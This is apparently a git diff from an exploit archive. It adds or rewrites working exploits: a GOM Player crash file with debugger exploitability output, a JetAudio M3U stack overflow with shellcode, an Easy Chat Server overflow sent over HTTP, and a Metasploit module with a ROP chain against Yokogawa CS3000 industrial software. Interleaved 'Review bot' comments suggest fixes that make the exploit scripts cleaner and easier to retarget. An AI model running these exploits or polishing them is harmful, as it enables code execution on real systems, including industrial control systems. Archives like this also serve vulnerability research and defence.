\x69\x7E\x9D\x70\xA2\xA2\x71\x57\xC2\x6C\xC2\xDF\xE2\xEB\x39\xC9\x87\xEC\xD2\x5E\x45\x1D\x53\x5F\xEE\xBF\x3C\x66\x1B\x83\xB5\x5D\x43\x41\xA9\xD9\xFB\x22\x7F\xBD\x70\x73\x25\xF4\xFA\xFE\xCA\xE8\x88\xED\x73\x2E\xB9\x9C\x64\xA7\xB3\x61\x89\x7B\xDF\x11\x44\x52\xDF\x7A\xDC\x92\xEC\x7C\xA2\x2B\x8F\x92\x5C\x9B\xCE\x21\x1F\xC8\xCC\x15\xEF\x53\xB0\x5B\xE5\x51\x5F\x18\x72\x0F\x89\x7F\x69\x59\x10\x58\x36\xF8\x58\x15\x11\x6D\x96\x8E\xDB\xEF\xCD\x38\xC6\xA7\xEF\xE7\xFE\x68\x61\x61\x26\x5E\x15\x11\x95\xC7\xA6\x29\x02\xA6\x8A\x20\x2A\xC6\x91\x88\xBE\x6D\x99\x68\xF8\x2F\xB0\x1C\x38\xB0\x6C\x09\x05\x00\xBE\xAB\x85\x2E\x47\xC8\xFF\x0C\x22\xED\x55\x91\x28\xF2\xAD\x16\x53\x17\xF8\xCF\x19\x30\x90\x78\xAB\x93\x33\x37\xFD\xFB\xB9\xDF\x25\x5C\x5A\x01\xDB\x9C\xFB\x29\xA0\xDC\x67\xAB\x24\x13\xD2\x77\x06\x00\x00\x00\x00\xD8\xC9\x3C\x93\x47\x63\xF7\x34\xFE\xCF\xCC\x36\xDE\xF0\x6B\xEF\xE1\x64\xC2\x28\x91\xE3\xC1\x69\x0E\xC5\x2B\x2D\x39\xB7\xAD\xEB\x6E\xB6\x66\x64\xD7\x2F\x96\xA7\xCB\x3A\xFD\xB5\xF3\xFD\xD5\x43\xF5\xB0\x8D\xBD\xA9\xFE\x31\xA3\xFB\xAF\x0E\xB4\x8A\x60\xC6\x5C\x1A\x5D\xC7\xC1\xDC\x72\x65\x22\x0B\x7C\xC4\xDE\x77\x96\x9F\xAD\xC9\xD3\x33\xDB\xF9\x1F\x3D\x8F\x9C\x49\xA7\xE7\xF5\xBB\x15\xCF\xBB\x93\xF3\x2C\x6D\xF3\x6F\x8C\x35\x97\xFC\x85\xFB\xCE\x1C\xAE\xE1\x92\xD4\xE3\xF1\x3B\x6C\xAC\xD9\xB3\xC2\xDD\xDD\x25\x4E\x37\x8B\xC4\x38\x86\xFB\xBE\x
EF\x6B\xEB\x83\x59\xEF\xF9\x15\xE8\x61\xAA\x9A\x66\xB7\x5E\xB6\x2A\xC9\x5E\xFC\x29\x31\x4D\x49\x6F\x9F\x48\xA8\x74\x1D\xE5\xE4\xEB\x3F\x97\x23\xB8\x17\x6C\x7E\xCA\x3F\x5C\xAA\xA4\xA7\x3C\x96\xBD\xF8\xFE\x74\x7F\xF0\xB7\xA9\x3D\x6D\x4D\xEF\x7D\xFF\x5C\x75\x8C\x2E\x7B\x36\x61\xB5\x30\x50\x11\xF0\xCB\x14\x64\x2D\x59\x3D\x9C\xA1\x7E\xEE\x1E\xCF\x90\x39\x4F\x6B\xD3\x1A\x26\x2B\xAC\xF6\x16\x2A\x26\x7A\xF3\xB6\xF5\xCD\x4B\xB0\x6F\x4E\x4B\x56\xEC\x3F\x72\x88\x25\x00\x59\x92\xC1\x96\xF4\x81\xE5\x2D\xD3\xDB\x67\x4B\x72\x53\x55\xCC\xDF\x31\xC4\xB0\xD7\x7B\x72\x33\xD4\x5F\xE4\xF0\xAF\xCF\x0E\x6D\x49\x78\x00\xBE\xAB\x85\x22\x46\xFD\xBF\x41\xC6\x56\x99\x53\xED\x67\xB5\x24\x4C\x71\xFD\x6F\x00\x03\xA9\xFE\x97\xC1\xB0\x76\x02\xA3\x8E\xD4\x29\xA0\xDA\x53\xAD\x72\x34\x7C\x30\x00\x8C\x30\x00\x00\x20\x72\x31\x5C\xFB\x63\x1B\xE5\xA9\x53\xFB\x75\x73\x54\x97\xDD\x6D\xB7\x36\x39\x36\xF5\x0B\xF1\xAE\x04\x0A\xDE\xF4\x91\x78\xC9\x51\xAF\xF1\x13\x6B\xF2\x95\x0F\xDB\x7B\x9F\x8C\xFD\xDF\x79\xF9\xE7\x0F\x07\xD9\x94\xCD\xEB\x94\xBA\xFD\xC7\xE4\xBA\xF6\xE7\xC1\x3C\x72\xAF\x8F\x8B\x33\x1E\x74\x72\x8B\x6C\xC5\x0F\x5D\xED\x93\x12\x1A\xFE\x77\xFF\xFB\xEA\xE4\xFD\x6D\x57\x33\xA6\x39\xD4\xA7\xC1\x65\x65\x73\xE5\x7F\x89\xCD\x66\x53\x03\xFB\x67\x15\x73\x95\x48\xF7\xA6\xE7\x79\x3A\xDD\x1C\x2D\xC7\xCF\x3C\xCE\xF1\xCC\xCC\xA9\xC7\xB9\x23\x1D\x39\x7C\x43\x64\xA9\x9B\x60\xA1\x7D\xF5\x4B\xC6\xDB\x05\x8C\xFC\xA5\xAC\x7B\x3C\x7D\xBE\xBE\xC9\x5B\x91\x71\xB3\x24\xBB\x8D\xEF\x3C\xEA\xDD\x47\x9E\xC8\xC9\x30\xF0\x9B\xA3\xBD\x16\x91\x48\xA2\x42\x4C\x6F\x42\xF5\x99\xCA\xA2\x12\xBA\xEE\xAE\x7D\x5E\x53\x9F\xF5\x01\x93\xC3\xE0\xEB\xA0\x15\x98\x33\x6A\xDD\x4F\x67\x67\x53\x00\x01\x00\x55\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x04\x00\x00\x00\x16\x3D\x35\xFD\x28\x46\xFF\x4C\xFF\x52\xFF\x4E\xFF\x6A\xFF\x53\x46\x51\x54\x53\x56\x52\x51\x58\x51\x52\x48\x44\x56\x54\x56\x56\x53\x58\x53\x51\x51\x56\x52\x57\x57\x55\x52\x57\x54\x3B\x0B\x66\x98\xFB\xBD\xAF\x64\x85\xD6\x55\x54\xFE\x7B\x37\xE0\x9C\x80\xCF\x62\x57\xBC\x6B\x61\xB2\xCC\xFF\x
CA\xD2\x2F\x63\xD7\x28\x5C\x9E\xC7\x77\xA1\xDA\xBC\x9F\xFD\x42\x13\x9B\xA7\xA1\xA6\xAA\xA2\xE6\x49\xC5\x14\x11\x51\xC1\x90\xEF\x31\xB8\xFB\x58\x50\x70\x00\x10\x48\x00\x02\x3E\xCC\x65\xB1\x06\xFD\xCF\x81\x74\x33\x24\x0D" + +outfile = file("poc.ogg", 'wb') + +outfile.write(data) + +outfile.close() + +print "Created Poc" + +''' +--------------------------------------------------------------------------------------- +windbg result: + +Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86 +Copyright (c) Microsoft Corporation. All rights reserved. + +*** wait with pending attach +Symbol search path is: *** Invalid *** +**************************************************************************** +* Symbol loading may be unreliable without a symbol search path. * +* Use .symfix to have the debugger choose a symbol path. * +* After setting your symbol path, use .reload to refresh symbol locations. * +**************************************************************************** +Executable search path is: +ModLoad: 00400000 00c32000 C:\Program Files\GRETECH\GomPlayer\GOM.EXE +ModLoad: 7c900000 7c9af000 C:\WINDOWS\system32\ntdll.dll +ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll +ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.dll +ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll +ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll +ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll +ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll +ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll +ModLoad: 76380000 76385000 C:\WINDOWS\system32\MSIMG32.dll +ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\COMDLG32.dll +ModLoad: 773d0000 774d3000 +C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\COMCTL32.dll +ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll +ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll +ModLoad: 7c9c0000 7d1d7000 
C:\WINDOWS\system32\SHELL32.dll +ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV +ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\UxTheme.dll +ModLoad: 774e0000 7761d000 C:\WINDOWS\system32\ole32.dll +ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll +ModLoad: 7df70000 7df92000 C:\WINDOWS\system32\oledlg.dll +ModLoad: 7e1e0000 7e282000 C:\WINDOWS\system32\urlmon.dll +ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll +ModLoad: 77920000 77a13000 C:\WINDOWS\system32\SETUPAPI.dll +ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll +ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll +ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.dll +ModLoad: 76c30000 76c5e000 C:\WINDOWS\system32\WINTRUST.dll +ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll +ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll +ModLoad: 76c90000 76cb8000 C:\WINDOWS\system32\IMAGEHLP.dll +ModLoad: 771b0000 7725a000 C:\WINDOWS\system32\WININET.dll +ModLoad: 76d60000 76d79000 C:\WINDOWS\system32\IPHLPAPI.DLL +ModLoad: 74c80000 74cac000 C:\WINDOWS\system32\OLEACC.dll +ModLoad: 76080000 760e5000 C:\WINDOWS\system32\MSVCP60.dll +ModLoad: 629c0000 629c9000 C:\WINDOWS\system32\LPK.DLL +ModLoad: 74d90000 74dfb000 C:\WINDOWS\system32\USP10.dll +ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll +ModLoad: 76ee0000 76f1c000 C:\WINDOWS\system32\RASAPI32.DLL +ModLoad: 76e90000 76ea2000 C:\WINDOWS\system32\rasman.dll +ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll +ModLoad: 76eb0000 76edf000 C:\WINDOWS\system32\TAPI32.dll +ModLoad: 76e80000 76e8e000 C:\WINDOWS\system32\rtutils.dll +ModLoad: 722b0000 722b5000 C:\WINDOWS\system32\sensapi.dll +ModLoad: 769c0000 76a74000 C:\WINDOWS\system32\USERENV.dll +ModLoad: 68000000 68036000 C:\WINDOWS\system32\rsaenh.dll +ModLoad: 015a0000 01865000 C:\WINDOWS\system32\xpsp2res.dll +ModLoad: 75e60000 75e73000 C:\WINDOWS\system32\cryptnet.dll +ModLoad: 76bf0000 76bfb000 C:\WINDOWS\system32\PSAPI.DLL 
+ModLoad: 4d4f0000 4d549000 C:\WINDOWS\system32\WINHTTP.dll +ModLoad: 76f60000 76f8c000 C:\WINDOWS\system32\WLDAP32.dll +ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL +ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll +ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime +ModLoad: 10000000 1006a000 C:\Program +Files\GRETECH\GomPlayer\GomTVStrm.dll +ModLoad: 71ad0000 71ad9000 C:\WINDOWS\system32\wsock32.dll +ModLoad: 767f0000 76817000 C:\WINDOWS\system32\schannel.dll +ModLoad: 71a50000 71a8f000 C:\WINDOWS\System32\mswsock.dll +ModLoad: 76f20000 76f47000 C:\WINDOWS\system32\DNSAPI.dll +ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv +ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv +ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll +ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll +ModLoad: 4ec50000 4edf6000 +C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.5512_x-ww_dfb54e0c\gdiplus.dll +ModLoad: 02440000 025cd000 C:\WINDOWS\system32\macromed\flash\flash.ocx +ModLoad: 76fb0000 76fb8000 C:\WINDOWS\System32\winrnr.dll +ModLoad: 76fc0000 76fc6000 C:\WINDOWS\system32\rasadhlp.dll +ModLoad: 7e290000 7e401000 C:\WINDOWS\system32\shdocvw.dll +ModLoad: 754d0000 75550000 C:\WINDOWS\system32\CRYPTUI.dll +ModLoad: 71800000 71888000 C:\WINDOWS\system32\shdoclc.dll +ModLoad: 75cf0000 75d81000 C:\WINDOWS\system32\mlang.dll +ModLoad: 662b0000 66308000 C:\WINDOWS\system32\hnetcfg.dll +ModLoad: 71a90000 71a98000 C:\WINDOWS\System32\wshtcpip.dll +ModLoad: 02e00000 02e08000 C:\Program Files\Internet Download +Manager\idmmkb.dll +ModLoad: 76980000 76988000 C:\WINDOWS\system32\LINKINFO.dll +ModLoad: 76990000 769b5000 C:\WINDOWS\system32\ntshrui.dll +ModLoad: 76b20000 76b31000 C:\WINDOWS\system32\ATL.DLL +ModLoad: 74810000 7497d000 C:\WINDOWS\system32\quartz.dll +ModLoad: 03f20000 03f50000 C:\Program Files\GRETECH\GomPlayer\grfu.ax +ModLoad: 4fdd0000 4ff76000 C:\WINDOWS\system32\d3d9.dll +ModLoad: 
6d990000 6d996000 C:\WINDOWS\system32\d3d8thk.dll +ModLoad: 73760000 737ab000 C:\WINDOWS\system32\DDRAW.dll +ModLoad: 73bc0000 73bc6000 C:\WINDOWS\system32\DCIMAN32.dll +ModLoad: 471b0000 47211000 C:\WINDOWS\system32\qdvd.dll +ModLoad: 04060000 04338000 C:\Program Files\GRETECH\GomPlayer\gvf.ax +ModLoad: 6eac0000 6eb26000 C:\Program +Files\GRETECH\GomPlayer\avutil-gp-52.dll +ModLoad: 62e40000 63a37000 C:\Program +Files\GRETECH\GomPlayer\avcodec-gp-55.dll +ModLoad: 6dd80000 6ddf2000 C:\Program +Files\GRETECH\GomPlayer\swscale-gp-2.dll +ModLoad: 67680000 677a0000 C:\Program +Files\GRETECH\GomPlayer\avformat-gp-55.dll +ModLoad: 04350000 043a7000 C:\Program Files\GRETECH\GomPlayer\tbb.dll +ModLoad: 043c0000 04543000 C:\Program Files\GRETECH\GomPlayer\gaf.ax +ModLoad: 04670000 046af000 C:\Program +Files\GRETECH\GomPlayer\MediaSource.ax +(ef0.890): Access violation - code c0000005 (!!! second chance !!!) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for +C:\WINDOWS\system32\ntdll.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for +C:\Program Files\GRETECH\GomPlayer\gaf.ax - +eax=00002000 ebx=00000001 ecx=3f7fd7f2 edx=00000000 esi=0456422c +edi=04564008 +eip=043e577f esp=0012d640 ebp=0012d654 iopl=0 nv up ei ng nz ac pe +cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 +efl=00200297 +gaf!DllUnregisterServer+0x22adf: +043e577f 8b4108 mov eax,dword ptr [ecx+8] +ds:0023:3f7fd7fa=???????? +0:000> .load winext/msec.dll +0:000> !exploitable + +!exploitable 1.6.0.0 +Exploitability Classification: PROBABLY_EXPLOITABLE +Recommended Bug Title: Probably Exploitable - Data from Faulting Address +controls Code Flow starting at gaf!DllUnregisterServer+0x0000000000022adf +(Hash=0xc4cf042d.0x370f0914) + +The data from the faulting address is later used as the target for a branch.''' \ No newline at end of file diff --git a/platforms/windows/local/9375.py b/platforms/windows/local/9375.py index 6d94c9924..33966b18c 100755 
--- a/platforms/windows/local/9375.py
+++ b/platforms/windows/local/9375.py
@@ -1,50 +1,50 @@ -#!/usr/bin/env python - -########################################################################################### -# -# JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH) -# Coded By: Dr_IDE -# Found By: HACK4LOVE -# Tested on Windows XP SP2 -# -############################################################################################ - -# windows/exec - 303 bytes -# http://www.metasploit.com -# Encoder: x86/alpha_upper -# EXITFUNC=seh, CMD=calc -sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" -"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" -"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" -"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" -"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" -"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47" -"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c" -"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a" -"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46" -"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45" -"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c" -"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c" -"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44" -"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" -"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46" -"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50" -"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44" -"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" -"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43" -"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b" -"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43" -"\x51\x42\x4c\x42\x43\x43\x30\x41\x41"); - - -jump = ("\xEB\x06\x90\x90"); -retn = ("\x45\x10\x22\x01"); -nops = ("\x90" * 16); -buff = ("http://" + "\x41" * 1017); -junk = ("\x45" * (876 - len(sc))); - -f1 = open('Dr_IDE-JetAudio.M3U','w'); 
-f1.write(buff + jump + retn + nops + sc + junk); -f1.close(); - -# milw0rm.com [2009-08-06] +#!/usr/bin/env python + +########################################################################################### +# +# JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH) +# Coded By: Dr_IDE +# Found By: HACK4LOVE +# Tested on Windows XP SP2 +# +############################################################################################ + +# windows/exec - 303 bytes +# http://www.metasploit.com +# Encoder: x86/alpha_upper +# EXITFUNC=seh, CMD=calc +sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" +"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" +"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" +"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" +"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" +"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47" +"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c" +"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a" +"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46" +"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45" +"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c" +"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c" +"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44" +"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" +"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46" +"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50" +"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44" +"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" +"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43" +"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b" +"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43" +"\x51\x42\x4c\x42\x43\x43\x30\x41\x41"); + + +jump = ("\xEB\x06\x90\x90"); +retn = ("\x45\x10\x22\x01"); +nops = ("\x90" * 16); +buff = ("http://" + "\x41" * 1017); +junk = 
("\x45" * (876 - len(sc)));
+
+f1 = open('Dr_IDE-JetAudio.M3U','w');
+f1.write(buff + jump + retn + nops + sc + junk);
+f1.close();
+
+# milw0rm.com [2009-08-06]
diff --git a/platforms/windows/remote/33326.py b/platforms/windows/remote/33326.py
new file mode 100755
index 000000000..ff6265284
--- /dev/null
+++ b/platforms/windows/remote/33326.py
@@ -0,0 +1,55 @@
+## Exploit-DB Note: Must install to 'C:\Program Files\EFS Software\Easy Chat Server'
+
+
+# Exploit Title: Easy Chat Server 3.1 stack buffer overflow
+# Date: 9 May 2014
+# Exploit Author: superkojiman - http://www.techorganic.com
+# Vendor Homepage: http://www.echatserver.com/
+# Software Link: http://www.echatserver.com/
+# Version: 3.1
+# Tested on: Windows 7 Enterprise SP1, English
+#
+# Description:
+# A buffer overflow is triggered when when passing a long username.
+
+
+import socket
+import struct
+
+# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
+# msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin
+# [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
+shellcode = (
+"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
+"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
+"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
+"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
+"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
+"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
+"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
+"\x1c\x39\xbd"
+)
+
+# SEH overwritten at offset 207 when Easy Chat Server is
+# installed in C:\Program Files\EFS Software\Easy Chat Server
+payload = "A"*203
+payload += "\xeb\x06\x90\x90" # short jmp to shellcode
+payload += "\x1e\x0e\x01\x10" # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL
+payload += "\x81\xc4\xd8\xfe\xff\xff" # add esp,-128
+payload += shellcode # calc.exe
+payload += "D"*193
+
+buf = (
+"GET /chat.ghp?username=" + payload + "&password=&room=1&sex=1 HTTP/1.1\r\n"
+"User-Agent: Mozilla/4.0\r\n"
+"Host: 192.168.1.136:80\r\n"
+"Accept-Language: en-us\r\n"
+"Accept-Encoding: gzip, deflate\r\n"
+"Referer: http://192.168.1.136\r\n"
+"Connection: Keep-Alive\r\n\r\n"
+)
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("192.168.123.131", 80))
+s.send(buf)
+print s.recv(1024)
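Review bot: The socket created in the last four lines of the hunk is never closed, so the descriptor stays open until interpreter exit; an explicit `s.close()` after the `recv` (or `contextlib.closing(socket.socket(...))`) would release it on every path. The address appears three times with two different values — `192.168.123.131` in `connect` and `192.168.1.136` in the Host and Referer headers — so a single `host` variable defined once near the top and used in all three places would keep them consistent and make the one thing to edit obvious. `import struct` is unused and can go. The description comment has a doubled word: `# A buffer overflow is triggered when passing a long username.`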
diff --git a/platforms/windows/remote/33331.rb b/platforms/windows/remote/33331.rb
new file mode 100755
index 000000000..dc031e26c
--- /dev/null
+++ b/platforms/windows/remote/33331.rb
@@ -0,0 +1,160 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Yokogawa CS3000 BKESimmgr.exe Buffer Overflow', + 'Description' => %q{ + This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability + exists in the BKESimmgr.exe service when handling specially crafted packets, due to an + insecure usage of memcpy, using attacker controlled data as the size count. This module + has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows + 2003 SP2. + }, + 'Author' => + [ + 'juan vazquez', + 'Redsadic ' + ], + 'References' => + [ + ['CVE', '2014-0782'], + ['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities'], + ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf'] + ], + 'Payload' => + { + 'Space' => 340, + 'DisableNops' => true, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]', + { + 'Ret' => 0x61d1274f, # 0x61d1274f # ADD ESP,10 # RETN # libbkebatchepa.dll + 'Offset' => 64, + 'FakeArgument1' => 0x0040E65C, # ptr to .data on BKESimmgr.exe + 'FakeArgument2' => 0x0040EB90 # ptr to .data on BKESimmgr.exe + } + ], + ], + 'DisclosureDate' => 'Mar 10 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(34205) + ], self.class) + end + + def check + data = create_pkt(rand_text_alpha(4)) + + res = send_pkt(data) + + if res && res.length == 10 + simmgr_res = parse_response(res) + + if valid_response?(simmgr_res) + check_code = Exploit::CheckCode::Appears + else + 
check_code = Exploit::CheckCode::Safe + end + else + check_code = Exploit::CheckCode::Safe + end + + check_code + end + + def exploit + bof = rand_text(target['Offset']) + bof << [target.ret].pack("V") + bof << [target['FakeArgument1']].pack("V") + bof << [target['FakeArgument2']].pack("V") + bof << rand_text(16) # padding (corrupted bytes) + bof << create_rop_chain + bof << payload.encoded + + data = [0x1].pack("N") # Sub-operation id, <= 0x8 in order to pass the check at sub_4090B0 + data << [bof.length].pack("n") + data << bof + + pkt = create_pkt(data) + + print_status("Trying target #{target.name}, sending #{pkt.length} bytes...") + connect + sock.put(pkt) + disconnect + end + + def create_rop_chain + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = + [ + 0x004047ca, # POP ECX # RETN [BKESimmgr.exe] + 0x610e3024, # ptr to &VirtualAlloc() [IAT libbkfmtvrecinfo.dll] + 0x61232d60, # MOV EAX,DWORD PTR DS:[ECX] # RETN [LibBKESysVWinList.dll] + 0x61d19e6a, # XCHG EAX,ESI # RETN [libbkebatchepa.dll] + 0x619436d3, # POP EBP # RETN [libbkeeda.dll] + 0x61615424, # & push esp # ret [libbkeldc.dll] + 0x61e56c8e, # POP EBX # RETN [LibBKCCommon.dll] + 0x00000001, # 0x00000001-> ebx + 0x61910021, # POP EDX # ADD AL,0 # MOV EAX,6191002A # RETN [libbkeeda.dll] + 0x00001000, # 0x00001000-> edx + 0x0040765a, # POP ECX # RETN [BKESimmgr.exe] + 0x00000040, # 0x00000040-> ecx + 0x6191aaab, # POP EDI # RETN [libbkeeda.dll] + 0x61e58e04, # RETN (ROP NOP) [LibBKCCommon.dll] + 0x00405ffa, # POP EAX # RETN [BKESimmgr.exe] + 0x90909090, # nop + 0x619532eb # PUSHAD # RETN [libbkeeda.dll] + ].pack("V*") + + rop_gadgets + end + + def create_pkt(data) + pkt = [0x01].pack("N") # Operation Identifier + pkt << [data.length].pack("n") # length + pkt << data # Fake packet + + pkt + end + + def send_pkt(data) + connect + sock.put(data) + res = sock.get_once + disconnect + + res + end + + def parse_response(data) + data.unpack("NnN") + end + + def valid_response?(data) + valid = 
false + + if data && data[0] == 1 && data[1] == 4 && data[1] == 4 && data[2] == 5 + valid = true + end + + valid + end + +end \ No newline at end of file diff --git a/platforms/windows/remote/33333.rb b/platforms/windows/remote/33333.rb new file mode 100755 index 000000000..70d689f9c --- /dev/null +++ b/platforms/windows/remote/33333.rb 
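Review bot: `valid_response?` tests `data[1] == 4` twice, so the second clause is dead and reads like a copy-paste slip; the condition should be `if data && data[0] == 1 && data[1] == 4 && data[2] == 5`, or the duplicate replaced with whichever field it was meant to check. `parse_response` unpacks with `"NnN"` but names none of the three fields; a one-line comment on that call in the same style as the `# Operation Identifier` / `# length` comments in `create_pkt` would make the constants in `valid_response?` legible. The module also omits `'License' => MSF_LICENSE`, which the sibling module 33333.rb in this same commit sets. In `check`, a missing or wrong-length response is reported as `CheckCode::Safe`; `CheckCode::Unknown` is the more accurate result for the no-response branch, since nothing was actually verified.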
